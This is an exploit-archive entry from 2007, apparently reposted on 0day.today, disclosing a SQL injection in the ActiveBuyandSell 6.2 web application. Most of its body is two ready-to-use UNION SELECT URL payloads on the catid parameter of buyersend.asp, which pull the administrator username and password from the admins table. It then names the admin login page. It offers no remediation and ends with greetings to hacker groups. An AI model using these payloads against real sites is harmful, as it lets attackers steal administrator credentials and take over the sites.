id: 1638
date: 03/23/2007
title: ActiveBuyandSell 6.2 (buyersend.asp catid) SQL Injection Vulnerability
author: CyberGhost
cves: 

======================================================================
ActiveBuyandSell 6.2 (buyersend.asp catid) SQL Injection Vulnerability
======================================================================



#Title  : Active BuyandSell Remote SQL Injection Vulnerability
#Author : CyberGhost

#Vuln.

#Username : /buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,adminname,8,9,0,1,2,3,4,5,6+from+admins
#Password : /buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,password,8,9,0,1,2,3,4,5,6+from+admins

#Admin Login : /admin.asp
====================================

Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3

And All TURKISH HACKERS !



#  0day.today [2023-03-24]  #